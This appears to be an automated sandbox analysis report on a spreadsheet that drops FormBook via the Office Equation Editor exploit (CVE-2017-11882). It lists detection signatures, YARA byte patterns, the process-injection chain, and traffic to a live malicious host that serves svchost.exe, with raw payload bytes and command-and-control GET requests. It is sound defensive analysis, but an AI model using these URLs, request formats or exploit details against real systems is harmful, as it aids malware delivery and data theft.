Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name:Booking Confirmation.xlsx
Analysis ID:323046
MD5:97ee696e60901ec520c93f0e8b29b956
SHA1:89780a503e1b57b7d224feb43c5db4db60ede9ff
SHA256:2f2cf9a7f17157fbf03d37450588c9a1396535874097c29d7b12e512295f85ec
Tags:FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2448 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2536 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2884 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5DEDC928F9F5E3A4C59490E79BCF0773)
      • RegSvcs.exe (PID: 2344 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 3024 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 3004 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x183f9:$sqlite3step: 68 34 1C 7B E1
      • 0x1850c:$sqlite3step: 68 34 1C 7B E1
      • 0x18428:$sqlite3text: 68 38 2A 90 C5
      • 0x1854d:$sqlite3text: 68 38 2A 90 C5
      • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
      00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.RegSvcs.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.RegSvcs.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.RegSvcs.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x175f9:$sqlite3step: 68 34 1C 7B E1
          • 0x1770c:$sqlite3step: 68 34 1C 7B E1
          • 0x17628:$sqlite3text: 68 38 2A 90 C5
          • 0x1774d:$sqlite3text: 68 38 2A 90 C5
          • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
          5.2.RegSvcs.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            5.2.RegSvcs.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2536, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2536, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
            Sigma detected: Executables Started in Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
            Sigma detected: Execution in Non-Executable FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
            Sigma detected: Suspicious Program Location Process StartsShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exeAvira URL Cloud: Label: malware
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeReversingLabs: Detection: 25%
            Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 25%
            Multi AV Scanner detection for submitted fileShow sources
            Source: Booking Confirmation.xlsxVirustotal: Detection: 31%Perma Link
            Source: Booking Confirmation.xlsxReversingLabs: Detection: 25%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: 5.2.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop esi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop esi
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi
            Source: global trafficDNS query: name: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
            Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49167
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Nov 2020 08:03:38 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 25 Nov 2020 23:15:49 GMTETag: "de000-5b4f69ba08c46"Accept-Ranges: bytesContent-Length: 909312Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9e e5 be 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d4 0d 00 00 0a 00 00 00 00 00 00 1e f3 0d 00 00 20 00 00 00 00 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 f2 0d 00 4b 00 00 00 00 00 0e 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 d3 0d 00 00 20 00 00 00 d4 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 06 00 00 00 00 0e 00 00 08 00 00 00 d6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0e 00 00 02 00 00 00 de 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 6f 0b 00 08 83 02 00 03 00 00 00 31 00 00 06 f8 6a 02 00 d0 04 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 06 00 00 00 01 00 00 11 28 02 00 00 06 2a 00 00 13 30 05 00 13 01 00 00 02 00 00 11 72 01 00 00 70 0a 06 72 09 00 00 70 28 08 00 00 06 28 09 00 00 06 3a c9 00 00 00 20 fa 1b 25 b4 20 e0 3a 01 ac 61 25 0c 1d 5e 45 07 00 00 00 05 00 00 00 a9 00 00 00 4f 00 00 00 d0 ff ff ff 1f 00 00 00 99 00 00 00 7d 00 00 00 38 a4 00 00 00 28 03 00 00 06 0b 07 2d 08 20 aa a8 23 fc 25 2b 06 20 eb 5c c8 de 25 26 2b b6 07 28 0d 00 00 06 28 0e 00 00 06 72 1d 00 00 70 28 0f 00 00 06 2c 08 20 2d 58 ab 08 25 2b 06 20 64 13 ed 55 25 26 08 20 2a ba e0 05 5a 61 2b 86 06 72 29 00 00 70 28 0a 00 00 06 28 0b 00 00 06 2c 08 20 25 c7 bf 5f 25 2b 06 20 c0 c9 bb 2a 25 26 08 20 d9 02 38 4b 5a 61 38 58 ff ff ff 72 4d 00 00 70 28 10 00 00 06 08 20 a6 ef a1 bc 5a 20 58 2c c2 78 61 38 3c ff ff ff 14 28 0c 00 00 06 20 ca 8a 29 b0 38 2c ff ff ff 14 fe 06 07 00 00 06 73 1d 00 00 0a 28 11 00 00 06 25 17 2
            Source: global trafficHTTP traffic detected: GET /kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== HTTP/1.1Host: www.affinitymotorsales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll HTTP/1.1Host: www.setyourhead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 103.125.191.5 103.125.191.5
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
            Source: Joe Sandbox ViewASN Name: WEBAIR-INTERNETUS WEBAIR-INTERNETUS
            Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: workfinewsdysanotherrainbowlomoyentwsnma.ydns.euConnection: Keep-Alive
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1631DAC0.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: workfinewsdysanotherrainbowlomoyentwsnma.ydns.euConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== HTTP/1.1Host: www.affinitymotorsales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll HTTP/1.1Host: www.setyourhead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
            Source: explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209306525.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2198231538.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
